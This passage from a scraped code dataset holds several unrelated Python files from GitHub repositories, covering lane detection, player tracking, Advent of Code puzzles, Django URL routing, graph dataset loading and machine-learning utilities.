glob\nimport os\nimport cProfile\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom calibrate import calibrate, undistort\nimport threshold as th\nimport perspective_transform as pt\nfrom lane import Lane\nimport postprocessing as post\n\n\ndef main():\n # calibrate the camera using the given chessboard images\n ret, mtx, dist, rvecs, tvecs = calibrate(\n path='../camera_cal/calibration*.jpg', \n xy=(9, 6),\n draw_corners=False\n )\n\n # inst. Lane object\n lane = Lane()\n\n # read video\n predicted_frames = []\n input_video = 'project_video.mp4'\n cap = cv2.VideoCapture(os.path.join('../input_videos/', input_video))\n while cap.isOpened():\n ret, frame = cap.read()\n\n if not ret:\n print('Cant receive frame. Exiting..')\n break\n \n # undistort an image\n rgb_img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # BGR => RGB\n undist = undistort(rgb_img, mtx, dist)\n\n # convert to gray\n gray = cv2.cvtColor(undist, cv2.COLOR_RGB2GRAY) # RGB => GRAY\n\n # apply gradient and color thresholding\n gradx = th.abs_sobel_thresh(gray)\n direction = th.dir_thresh(gray)\n gradient_binary = np.zeros_like(direction)\n gradient_binary[(gradx == 1) & (direction == 1)] = 1\n\n color_binary = th.saturation_thresh(frame)\n\n # combine gradient and color thresholding\n thresholded_img = th.threshold(gradient_binary, color_binary)\n\n # perspective transform: easier to measure curvature of lane from bird's eye view\n # also makes it easier to match car's location with a road map\n src, dst, M, M_inv = pt.get_transform_matrix()\n\n # transform image\n size = (thresholded_img.shape[1], thresholded_img.shape[0])\n transformed_img = cv2.warpPerspective(thresholded_img, M, size)\n\n # draw lines on transformed\n gray_transformed_img = np.uint8(transformed_img*255)\n bgr_transformed_img = cv2.cvtColor(gray_transformed_img, cv2.COLOR_GRAY2BGR)\n #pt.draw_plot_save(bgr_transformed_img, dst, 'Test Transformation', '../output_images/test_transform.png')\n\n # fit lines\n left_fit, right_fit, y, offset_meters = lane.fit_polynomials(transformed_img)\n\n # create blank for drawing lane lines\n zeros = np.zeros_like(transformed_img).astype(np.uint8)\n draw_img = np.dstack((zeros, zeros, zeros))\n \n # format points for fill poly\n pts_left = np.array([np.transpose(np.vstack([left_fit, y]))]) # [left_fit ... y]\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fit, y])))])\n pts = np.hstack((pts_left, pts_right)) # [pts_left, pts_right]\n cv2.fillPoly(draw_img, np.int_([pts]), (0, 255, 0))\n\n # unwarp transformed image\n unwarped = cv2.warpPerspective(draw_img, M_inv, (gray.shape[1], gray.shape[0]))\n\n # combine lane drawing w/ original image\n final_image = cv2.addWeighted(undist, 1, unwarped, 0.25, 0)\n\n # add measurement data to frame\n offset_side = 'left' if offset_meters < 0 else 'right'\n final_image = cv2.putText(final_image, f'Offset: {abs(offset_meters):0.2f}m {offset_side} of center', (50, 50), \n cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n \n # show predict\n cv2.imshow('frame', cv2.cvtColor(final_image, cv2.COLOR_RGB2BGR))\n\n # store predicted frames\n predicted_frames.append(final_image)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\n\n # release cap object\n cap.release()\n cv2.destroyAllWindows()\n\n # use predicted frames to convert back to video\n # video_frames = post.write_images(predicted_frames, '../video_frames/')\n # clip = post.make_video(video_frames, os.path.join('../output_videos/', input_video))\n # post.write_gif(\n # clip=clip, \n # path=os.path.join('../output_videos/', input_video + '.gif'),\n # sub_start=15,\n # sub_end=25\n # )\n\ncProfile.run('main()', sort='cumulative')","repo_name":"grantgasser/advanced-lane-finding","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"7687388126","text":"import os\nimport sys\npath = './src'\nsys.path.append(path)\n\nfrom .src import model as modellib \nfrom . import playerdetection_maskrcnn as pldec\nfrom Logger import Logger\n\nclass PlayerDetector:\n def __init__(self, useGpu):\n logger = Logger(\"Initializing player detector\")\n\n logger.log(\"Initializing\")\n MODEL_DIR = os.path.join(os.getcwd(), \"PlayerDetector/trained_networks/\")\n COCO_MODEL_PATH = os.path.join(MODEL_DIR, \"mask_rcnn_coco_humanpose.h5\")\n self.coco_config = pldec.InferenceConfig()\n self.coco_model = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=self.coco_config) \n self.coco_model.load_weights(COCO_MODEL_PATH,by_name = True)\n logger.log(\"Initialized\")\n\n def detect_players(self, frame):\n detectionLogger = Logger(\"Player detection\")\n detectionLogger.log(\"Start\")\n detection_result = pldec.detectplayerskeypoints(frame, self.coco_config, self.coco_model)[0]\n\n # The feet coordinates are returned\n playersfeetcoos = pldec.findplayersfeetcoos(detection_result)\n\n # These coordinates are not yet used but can later be added to analysis\n playersneckcoos = pldec.findplayersneckcoos(detection_result)\n playerkeypoints = pldec.findplayerkeypointsall(detection_result)\n playertorsokeypoints = pldec.findplayerkeypointstorso(detection_result)\n playergeneralfeatures = pldec.findplayergeneralfeatures(detection_result)\n\n detectionLogger.log(\"Completed\")\n\n return playersfeetcoos, playerkeypoints","repo_name":"the-alex-b/Football-Tracking","sub_path":"PlayerDetector/PlayerDetector.py","file_name":"PlayerDetector.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"7484182908","text":"import re\n\ndef get_input():\n with open('input14.txt') as file:\n return [x.strip() for x in file if x.strip()!=\"\"]\n\ndef parse_instruction(line):\n m = None\n if line.startswith(\"mask\"):\n m = re.fullmatch(\"mask = ([01X]+)\", line)\n return \"mask\", m.groups()[0]\n else:\n m = re.fullmatch(\"mem\\\\[(\\\\d+)\\\\] = (\\\\d+)\", line)\n return \"mem\", int(m.groups()[0]), int(m.groups()[1])\n\nclass Machine:\n def __init__(self):\n self.current_bitmask = None\n self.memory = {}\n\n def run(self, program):\n for statement in map(parse_instruction, program):\n instruction = statement[0]\n if instruction == \"mask\":\n self.current_bitmask = statement[-1]\n elif instruction == \"mem\":\n self.set_memory(statement[-2], statement[-1])\n else:\n raise \"Invalid instruction\"\n \n def set_memory(self, offset, value):\n if self.current_bitmask is not None:\n value = value | int(self.current_bitmask.replace(\"X\", \"0\"), 2)\n value = value & int(self.current_bitmask.replace(\"X\", \"1\"), 2)\n \n self.memory[offset] = value\n\nmachine = Machine()\nprogram = get_input()\nmachine.run(program)\n\nprint(f\"Sum of memory values for first program: {sum(machine.memory.values())}\")\n\nclass Machine2:\n def __init__(self):\n self.current_bitmask = None\n self.memory = {}\n\n def run(self, program):\n for statement in map(parse_instruction, program):\n instruction = statement[0]\n if instruction == \"mask\":\n self.current_bitmask = statement[-1]\n elif instruction == \"mem\":\n self.set_memory(statement[-2], statement[-1])\n else:\n raise \"Invalid instruction\"\n \n def set_memory(self, offset, value):\n mem_address = self.apply_mask(offset)\n\n count = self.current_bitmask.count(\"X\")\n for i in range(pow(2,count)):\n new_address = mem_address\n bits = f\"{i:036b}\"[-count:]\n for j in range(count):\n new_address = new_address.replace(\"X\", bits[j], 1)\n \n self.memory[int(new_address)] = value\n\n def apply_mask(self, offset):\n def combine(x,y):\n if x==\"0\": return y\n elif x==\"1\": return \"1\"\n else: return \"X\"\n\n tmp = map(combine, self.current_bitmask, f\"{offset:036b}\")\n return \"\".join(list(tmp))\n\n\n\nmachine2 = Machine2()\nmachine2.run(program)\n\nprint(f\"Sum of memory values for second program: {sum(machine2.memory.values())}\")\n","repo_name":"torarve/aoc2020","sub_path":"aoc14.py","file_name":"aoc14.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74859594278","text":"\n\nimport torch\nfrom transformers import BertTokenizer, BertModel\n\n# Load the BERT tokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n\n# Encode the text input as a sequence of token-ids\ninput_ids = torch.tensor([tokenizer.encode(\"Here is a sample input text.\", add_special_tokens=True)])\n\n# Load the BERT model\nmodel = BertModel.from_pretrained('bert-base-uncased')\n\n# Put the model in evaluation mode\nmodel.eval()\n\n# Forward pass the encoded text through the model\nwith torch.no_grad():\n outputs = model(input_ids)\n last_hidden_states = outputs[0] # The last hidden state is the representation of the input text\n","repo_name":"abhayc-glitch/save","sub_path":"src/pretrained_impl.py","file_name":"pretrained_impl.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"895401909","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = \"api\"\n\nurlpatterns = [\n path(\"user_history/\", views.api_current_user_history, name=\"current_user_history\"),\n path(\"inwarehouse_data/\", views.api_exists_inwarehouse_data, name=\"exists_inwarehouse_data\"),\n]\n","repo_name":"sola1121/worker_warehouse","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28520642054","text":"# %%\nfrom torch_geometric.datasets import AMiner,OGB_MAG,DBLP,IMDB,LastFM,HGBDataset,Taobao\nimport torch_geometric.transforms as T\ndef load_graph(graph_name:str):\n \n if graph_name == 'aminer':\n data_set = AMiner(root='./data/aminer')\n graph = data_set[0]\n return graph\n elif graph_name == 'ogb-mag':\n data_set = OGB_MAG(root='./data/ogb_mag',transform=T.ToUndirected())\n graph = data_set[0]\n return graph\n elif graph_name == 'dblp':\n data_set = DBLP(root='./data/dblp')\n graph = data_set[0]\n return graph\n elif graph_name == 'imdb':\n data_set = IMDB(root='./data/imdb')\n graph = data_set[0]\n return graph\n elif graph_name == 'last-fm':\n data_set = LastFM(root='./data/last_fm')\n graph = data_set[0]\n return graph\n elif graph_name == 'hgb':\n data_set = HGBDataset(root='./data/hgb',name=\"ACM\")\n graph = data_set[0]\n return graph\n elif graph_name == 'taobao':\n data_set = Taobao(root='./data/taobao',transform=T.ToUndirected())\n graph = data_set[0]\n return graph\n pass\n\n# %%\nif __name__ == \"__main__\":\n\n graph = load_graph('aminer')\n print(\"aminer\")\n print(graph)\n graph = load_graph('ogb-mag')\n print(\"ogb-mag\")\n print(graph)\n graph = load_graph('dblp')\n print(\"dblp\")\n print(graph)\n graph = load_graph('imdb')\n print(\"imdb\")\n print(graph)\n graph = load_graph('movie-lens')\n print(\"movie-lens\")\n print(graph)\n graph = load_graph('last-fm')\n print(\"last-fm\")\n print(graph)\n graph = load_graph('hgb')\n print(\"hgb\")\n print(graph)\n graph = load_graph('taobao')\n print(\"taobao\")\n print(graph)\n# %%\n","repo_name":"shenjiangqiu/hetero_py","sub_path":"python/src/hetro_py/load_graph.py","file_name":"load_graph.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42146167147","text":"from django.urls import path\nfrom . import views\nfrom django.conf.urls import url\n\napp_name = 'courses'\n\nurlpatterns = [\n # path(r'^$', views.class_search, name='class_search'),\n path('search/', views.class_search, name='class_search'),\n path('register_course/', views.course_registration, name='course_registration'),\n path('course_drop/', views.course_drop, name='course_drop'),\n path('', views.courses_offered, name='courses_offered'),\n path('list_classes/', views.list_classes, name='list_classes'),\n path('course_allocation/', views.course_allocation_view, name='course_allocation_view'),\n path('add_score/', views.add_score, name='add_score'),\n path('add_score//', views.add_score_for, name='add_score_for'),\n path('view_result/', views.view_result, name='view_result'),\n path('first_class_list/', views.first_class_list, name='first_class_list'),\n path('repeating_list/', views.repeat_list, name='repeat_list'),\n path('add_class/', views.add_class, name='add_class'),\n path('add_course/', views.add_course, name='add_course'),\n path('wait_list/', views.wait_list_view, name='wait_list_view'),\n path('set_up_session/', views.set_up_session, name='set_up_session'),\n path('academic_sessions/', views.sessions_list, name='academic_sessions_list'),\n path('academic_sessions//', views.session_details, name='academic_session_details'),\n path('warning/', views.send_warnings_auto, name='send_warnings_auto'),\n\n#-----------------------------------------------------------------------------------------#\n# Reviews Classes URLs #\n#-----------------------------------------------------------------------------------------#\n path('course_list/', views.course_list, name='course_list'),\n path('course_list//', views.course_detail, name='course_detail'),\n path('course_list//add_review/', views.add_review, name='add_review'),\n path('review_list/', views.review_list, name='review_list'),\n path('review_list//', views.review_detail, name='review_detail'),\n path('best_rated/', views.best_rated_classes, name='best_rated_classes'),\n\n\n\n\n\n path('description/', views.description, name='description'),\n \n # path('description//', views.description, name='description'),\n\n]\n\n\n\n\n\n# from django.shortcuts import render\n# from django.db.models import Q\n# from posts.models import Post\n\n# def searchposts(request):\n# if request.method == 'GET':\n# query= request.GET.get('q')\n\n# submitbutton= request.GET.get('submit')\n\n# if query is not None:\n# lookups= Q(title__icontains=query) | Q(content__icontains=query)\n\n# results= Post.objects.filter(lookups).distinct()\n\n# context={'results': results,\n# 'submitbutton': submitbutton}\n\n# return render(request, 'search/search.html', context)\n\n# else:\n# return render(request, 'search/search.html')\n\n# else:\n# return render(request, 'search/search.html')\n","repo_name":"ej0306/CUNY-ZERO-School-Management-System","sub_path":"courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36411062939","text":"class Solution:\n def frequencySort(self, s: str) -> str:\n hashmap = {}\n for i in s:\n hashmap[i] = hashmap.get(i, 0) + 1\n res = ''\n hashmap = sorted(hashmap.items(), key=lambda x: x[1], reverse=True)\n for k, v in hashmap:\n res += k * v\n return res\n\n '''\n to make it simple\n '''\n counter = Counter(s)\n cache = sorted([(-v, k) for k, v in counter.items()])\n res = ''\n for count, key in cache:\n res += -count * key\n return res\n","repo_name":"cicihou/LearningProject","sub_path":"leetcode-py/leetcode451.py","file_name":"leetcode451.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3673332633","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 18 10:53:55 2019\n\n@author: s1348875\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport os\nimport pandas as pd\nos.chdir('C:\\TRNSYS18\\MyProjects\\Script to run TRNSYS from python')\n\n\npareto=[]\n\n\nfor i in range(10): #range is the number of pareto fronts generated -1\n df = pd.DataFrame(pd.read_csv(os.getcwd()+\"\\\\240 ind - 200 gen - 3var - 250120 - STS and boiler fixed\\DLSC_Temuco_multiobj_hof_\"+str(10*i+10)+\".csv\",sep=\",\",header=None,names=['Cost', 'Emissions', 'Solar', 'LTS', 'Angle'],index_col=False))\n pareto.append(df) \nfig, ax = plt.subplots(figsize=(8, 6))\nax.set_xlabel('Emissions')\nax.set_ylabel('Cost')\nax.set(xlim=(0, 2000), ylim=(0, 6000))\nscat = ax.scatter(pareto[0]['Emissions'],pareto[0]['Cost'])\n\n#%%\ndef animate(j):\n scat.set_offsets(pareto[j][['Emissions','Cost']])\nanim = FuncAnimation(fig, animate, frames=10, interval=1000, repeat_delay=1000)\n \nplt.draw()\nplt.show()\n","repo_name":"smaximov84/Python-Code","sub_path":"pareto_animation.py","file_name":"pareto_animation.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31890396982","text":"from collections import namedtuple\nfrom math import floor, ceil\ninput_file =\"sample.txt\" if 0 else \"input.txt\"\n\nwith open(input_file) as inp:\n target_area = list(map(int, filter(None, (''.join([c if c != ' ' else '.' for c in inp.read() if c.isdigit() or c == '-' or c == '.' or c == ' '])).split('.'))))\n # print(target_area)\n target_area = namedtuple('Limits', ['x', 'y'])(namedtuple('Range', ['min', 'max'])(target_area[0], target_area[1]), namedtuple('Range', ['min', 'max'])(target_area[2], target_area[3]))\n print(target_area)\n def step(posx, posy, dx, dy):\n return (posx+dx, posy+dy, dx-1 if dx > 0 else 0, dy-1)\n\n def simulate(x, y, target_area):\n sx, sy = 0, 0\n highst_y = 0\n while sx <= target_area.x.max and sy >= target_area.y.min:\n sx, sy, x, y = step(sx, sy, x, y)\n highst_y = max(highst_y, sy)\n if sx <= target_area.x.max and sx >= target_area.x.min and sy <= target_area.y.max and sy >= target_area.y.min:\n return highst_y, True\n return 0, False\n \n h_hit = 0\n init_vels = []\n # print(init_vels)\n for x in range(target_area.x.max+1):\n for y in range(target_area.y.min, abs(target_area.y.min)):\n hishest_hit, hit = simulate(x,y, target_area)\n if hit:\n # print(x,y,hishest_hit)\n h_hit = max(h_hit, hishest_hit)\n # print((x,y))\n init_vels.append((x,y))\n print(h_hit)\n print(len(sorted(list(set(init_vels)))))\n # def x_after_k(x, k):\n # if k >= x+1:\n # return (x*(x+1))//2\n # else:\n # return (k*(2*x+1-k))//2\n\n # possible_starting_vels = set([])\n # for k in range(1, 5000):\n # if ceil((target_area.y.min + (k*(k-1))//2)/k) != floor((target_area.y.max + (k*(k-1))//2)/k)+1:\n # for x in range(1, 222):\n # possible_starting_vels.update(\n # [(x, dy) for dy in range(ceil((target_area.y.min + (k*(k-1))//2)/k), floor((target_area.y.max + (k*(k-1))//2)/k)+1) if target_area.x.min <= x_after_k(x, k) and target_area.x.max >= x_after_k(x, k)]\n # )\n # possible_starting_vels = sorted(list(possible_starting_vels))\n # print(sorted(list(set([(x, y) for x, y in possible_starting_vels if y >= 0]))))\n # heights = sorted(list(set([(y*(y-1))//2 for _, y in possible_starting_vels if y >= 0])))\n # print(heights[-1])\n","repo_name":"Qwedux/Advent_of_code_2021","sub_path":"Solutions/17/Day_17.py","file_name":"Day_17.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30584999067","text":"# Import modules\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom anyHR.constraint.Constraint import Constraints\nfrom anyHR.hit_and_run.hit_and_run import HitAndRun\n\n\ndef main_hit_and_run_2D_ball():\n # Define variables to use\n var_names = ['x', 'y']\n\n # Define the set of constraint\n c = Constraints(var_names)\n c.add_constraint('(x*x) + (y*y) < 1')\n c.add_constraint('(x*x) + (y*y) > 0.9')\n\n # Define the bounding hyperrectangle\n x_bound = [-10, 10]\n y_bound = [-10, 10]\n bounds = [x_bound, y_bound]\n\n hr = HitAndRun(S=c, B=bounds)\n\n a_s = []\n r_s = [[0, 0]]\n total_rejections = 0\n nb_samples = 100\n for i in range(nb_samples * 100):\n sample, rejections = hr._next_sample_cdhr()\n total_rejections = total_rejections + rejections\n a_s.append(sample)\n import random\n a_s = random.sample(a_s, nb_samples)\n\n print('Total number of rejections: ' + str(total_rejections))\n\n xs = [sample[0] for sample in a_s]\n ys = [sample[1] for sample in a_s]\n\n plt.scatter(xs,ys)\n plt.show()\n # plot_samples_2D(0, 1, var_names[0], var_names[1], a_s, r_s, None)\n\ndef sample_n_sphere_hr(dim:int, n = 100, burn_in_period = 100, thickness = 0.1):\n\n start = time.perf_counter()\n\n var_names = ['x' + str(i) for i in range(dim)]\n\n # Define the set of constraint\n c = Constraints(var_names)\n square_list = ['(' + str(name) + '*' + str(name) + ')' for name in var_names]\n\n constraint_str = '+'.join(square_list) + '< 1'\n\n constraint_str2 = '+'.join(square_list) + '> (1-' + str(thickness) + ')' + '* (1-' + str(thickness) + ')'\n\n c.add_constraint(constraint_str)\n c.add_constraint(constraint_str2)\n\n # Define the bounding hyperrectangle\n\n # for name in var_names:\n # locals()[name + '_bound'] = [-1,1] # not necessary\n\n bounds = list([[-1,1] for name in var_names])\n\n\n hr = HitAndRun(constraint=c, bounding_box=bounds)\n\n a_s = []\n r_s = [[0, 0]]\n\n\n samples = np.ndarray((dim, n))\n rejections = 0\n\n for i in range(n):\n\n for j in range(burn_in_period):\n sample, rejections_this_sample = hr.next_sample()\n rejections += rejections_this_sample # TODO does this number make sense to compare?\n\n sample, rejections_this_sample = hr.next_sample()\n rejections += rejections_this_sample\n\n samples[:,i] = sample\n\n end = time.perf_counter()\n\n elapsed = end-start\n\n return rejections, elapsed, samples\n\ndef plot_2d_proj(samples, thickness = None):\n circ = plt.Circle((0,0), 1, fill=False)\n\n fig, ax = plt.subplots(1, subplot_kw={'adjustable' : 'box', 'aspect' : 'equal'})\n ax.scatter(samples[0,:], samples[1,:], s= 3)\n ax.add_patch(circ)\n\n if thickness:\n circ_inner = plt.Circle((0,0), 1-thickness, fill=False)\n ax.add_patch(circ_inner)\n\n plt.show()\n\n\ndef min_example():\n # Define variables to use\n var_names = ['x', 'y']\n\n # Define the set of constraint\n c = Constraints(var_names)\n c.add_constraint('x+y < 1')\n\n # Define the bounding hyperrectangle\n x_bound = [0, 1]\n y_bound = [0, 1]\n bounds = [x_bound, y_bound]\n\n # build hr object\n hr = HitAndRun(constraint=c, bounding_box=bounds)\n\n # generate samples\n samples = []\n total_rejections = 0\n nb_samples = 100\n mixing = 10\n for i in range(nb_samples * mixing):\n sample, rejections = hr.next_sample()\n\n # do some mixing in between samples\n if i % mixing == 0:\n samples.append(sample)\n\n xs = [sample[0] for sample in samples]\n ys = [sample[1] for sample in samples]\n\n plt.scatter(xs,ys)\n plt.show()\n # plot_samples_2D(0, 1, var_names[0], var_names[1], a_s, r_s, None)\n\n\nif __name__ == '__main__':\n # rejections, elapsed, samples = sample_n_sphere_hr(dim=2)\n # plot_2d_proj(samples, thickness = 0.1)\n\n min_example()\n","repo_name":"figlerg/anyHR","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"6926209756","text":"# day23 part 2\n\nclass cup:\n def __init__(self, value, next_cup):\n self.value = value\n self.next_cup = next_cup\n\n\n\ndef create_cups():\n global cup_dict, cups\n\n c = cup(cups[0], None)\n cup_dict[cups[0]] = c\n\n # create a cup for the initial input values\n for i in range(1, len(cups)):\n nxt_cup = cup(cups[i], None)\n c.next_cup = nxt_cup\n \n cup_dict[cups[i]] = nxt_cup\n c = nxt_cup\n\n \n # add remaining cups for values up to 10**6\n for v in range(10, 10**6 + 1):\n nxt_cup = cup(v, None)\n c.next_cup = nxt_cup\n \n cup_dict[v] = nxt_cup\n c = nxt_cup\n \n \n # link last cup back to the starting cup\n nxt_cup.next_cup = cup_dict[cups[0]]\n\n\ndef print_values(n):\n global cups\n\n product = 1\n val = n\n for i in range(3):\n print(val, end = ', ')\n product *= val\n current_cup = cup_dict[val]\n nxt_cup = current_cup.next_cup\n val = nxt_cup.value\n \n print('\\t', product)\n\n\n\ndef play_round():\n global cup_dict, current_cup, destination_cup, MAX\n \n nxt_cup = current_cup.next_cup\n next_three_values_to_move = []\n for i in range(3):\n next_three_values_to_move.append(nxt_cup.value)\n nxt_cup = nxt_cup.next_cup\n\n #print('3tomove', next_three_values_to_move)\n \n ### get the destination value ###\n dest_value = current_cup.value - 1\n while dest_value in next_three_values_to_move:\n dest_value -= 1\n # ensure value is not smaller than minimum\n if dest_value == 0:\n dest_value = MAX\n # ensure MAX is not in number to remove\n while dest_value in next_three_values_to_move:\n dest_value -= 1\n\n # get destination cup\n destination_cup = cup_dict[dest_value]\n\n ### adjust pointers ###\n last_cup_to_remove = cup_dict[next_three_values_to_move[-1]]\n # current_cup should now point to whatever the 3rd item to remove was pointing to\n current_cup.next_cup = last_cup_to_remove.next_cup\n \n # destination_cup should now point to 1st item from 3 to remove\n temp_cup_pointer = destination_cup.next_cup # save the destination pointer\n first_cup_to_remove = cup_dict[next_three_values_to_move[0]]\n destination_cup.next_cup = first_cup_to_remove\n \n # last item from 3 to remove should now point to what destination cup was pointing to \n last_cup_to_remove.next_cup = temp_cup_pointer \n\n # update current cup\n current_cup = current_cup.next_cup\n\n\n\n \n\n# global variables\ncups = [2,5,3,1,4,9,8,6,7]\ncup_dict = dict() # value : cup\n\ncreate_cups()\n\ncurrent_cup = cup_dict[cups[0]]\ndestination_cup = None\nMAX = 10**6\n\nmove = 1\nwhile move <= 10**7:\n play_round()\n move += 1\n\nprint_values(1)\n\n\n\n\n","repo_name":"tara0017/Advent-of-Code","sub_path":"2020/day23part2.py","file_name":"day23part2.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26420935558","text":"from typing import Dict\n\nimport pandas as pd\n\nfrom encord_active.lib.db.tags import Tags\n\n\ndef count_of_tags(df: pd.DataFrame) -> Dict[str, int]:\n tag_list = Tags().all()\n if not tag_list:\n return {}\n\n tag_counts = df[\"tags\"].value_counts()\n\n total_tags_count: Dict[str, int] = {tag.name: 0 for tag in tag_list}\n for unique_list, count in tag_counts.items():\n for tag in unique_list:\n total_tags_count[tag.name] += count\n\n return total_tags_count\n","repo_name":"feemthan/encord-active","sub_path":"src/encord_active/lib/db/helpers/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"454992253","text":"from imports import *\n\ndef hough(edges):\n\th = np.zeros((100,361))\n\tfor edge in edges:\n\t\tfor o in range(360):\n\t\t\tp = round(abs(edge[0]*np.cos(o*np.pi/180) + edge[1]*np.sin(o*np.pi/180)))\n\t\t\n\t\t\th[p,o] += 1 \n\treturn h,o,p\n\ndef plot(edges,h):\n\th = h*255/h.max() \n\tplt.imshow(h,cmap = 'gray')\t\n\tplt.show()\t\n\n\nimg = cv2.imread('../pictures/ps1_1.png')\nedge_img = cv2.Canny(img,0,1)\n\nh,o,p = hough(edge_img)\nplot(edge_img,h)\n","repo_name":"ajayrfhp/computerVision","sub_path":"opencv_gists/hough_line.py","file_name":"hough_line.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"30309015752","text":"import os\n\n# 指定文件夹路径\nfolder_paths = [\n # \"./data/utility_cache/--topic effective --dataset adult --model AdultMLP\",\n # \"./data/utility_cache/--topic effective --dataset bank --model BankMLP\",\n \"./data/utility_cache/--topic robust --dataset adult --model AdultMLP\",\n \"./data/utility_cache/--topic robust --dataset bank --model BankMLP\",\n \"./data/utility_cache/--topic robust --dataset dota2 --model Dota2MLP\",\n \"./data/utility_cache/--topic robust --dataset tictactoe --model TicTacToeMLP\",\n]\n# 遍历文件夹中的所有文件\nfor folder_path in folder_paths:\n for filename in os.listdir(folder_path):\n # 获取文件名和文件扩展名a\n name, ext = os.path.splitext(filename)\n\n if 'data replication --' in name:\n new_name = name.replace('data replication --', 'data replication 1 --')\n elif 'random data generation --' in name:\n new_name = name.replace('random data generation --', 'random data generation 1 --')\n elif 'label flip --' in name:\n new_name = name.replace('label flip --', 'label flip 1 --')\n elif 'low quality data --' in name:\n new_name = name.replace('low quality data --', 'low quality data 1 --')\n # elif \"--distribution label skew\" in name:\n # new_name = name.replace('--distribution label skew', 'label skew')\n # else:\n # raise Exception\n else:\n continue\n\n # 构造新的文件名\n new_filename = new_name + ext\n\n # 构造旧的文件路径和新的文件路径\n old_path = os.path.join(folder_path, filename)\n new_path = os.path.join(folder_path, new_filename)\n #\n # old_path = folder_path + '/' + filename\n # new_path = folder_path + '/' + new_filename\n # 重命名文件\n os.rename(old_path, new_path)\n","repo_name":"veevang/flce-exp-eval-code","sub_path":"myrename.py","file_name":"myrename.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23221234286","text":"from models.GridEval import GridEval\nfrom sklearn.ensemble import RandomForestClassifier\n\nclass RandomForest(GridEval):\n \"\"\"run the Random Forest model\n \"\"\"\n\n def randomRunGrid(self,classWeight = None):\n \"\"\"Set the parameters to select from for Random Grid Search \n Output:\n the best model returned by random grid search\n \"\"\"\n print(\"\\n\"+\"RANDOM FOREST\"+\"\\n\")\n n_estimators = [x for x in range(5,20,4)]\n max_features = ['auto']\n max_depth = [x for x in range(60,95,15)]\n bootstrap = [True]\n rand_param = { 'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'bootstrap': bootstrap,\n 'n_jobs': [-1],\n 'class_weight': [classWeight]\n } \n \n randfor = RandomForestClassifier()\n return(self.randomGrid(randfor,rand_param,9))\n\n def randomBest(self):\n \"\"\"define the best performing random forest model for application_train.csv\n \"\"\"\n print(\"\\n\"+\"RANDOM FOREST\"+\"\\n\")\n self.model = RandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=90, max_features='auto', max_leaf_nodes=None,\n min_impurity_decrease=0.0, min_impurity_split=None,\n min_samples_leaf=1, min_samples_split=2,\n min_weight_fraction_leaf=0.0, n_estimators=17, n_jobs=-1,\n oob_score=False, random_state=None, verbose=0,\n warm_start=False)\n self.evaluate()","repo_name":"regap4693/BINARY-CLASSIFICATION","sub_path":"models/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24976222634","text":"import numpy as np\nimport pandas as pd\nfrom Stocks import *\nfrom StockData import *\n\n\nclass LowRiskInvestment:\n def __init__(self, stocks):\n self.s = stocks\n self.stocks = stocks.stocks_list()\n self.df_daily_return = stocks.daily_return_for_all_stocks()\n self.df_adj_close = stocks.get_adj_close_for_all_stocks()\n\n def get_cov_roi_for_all_stocks(self):\n # it will return return on investments and coefficient variance\n col_names = [\"Ticker\", \"COV\", \"ROI\"]\n df = 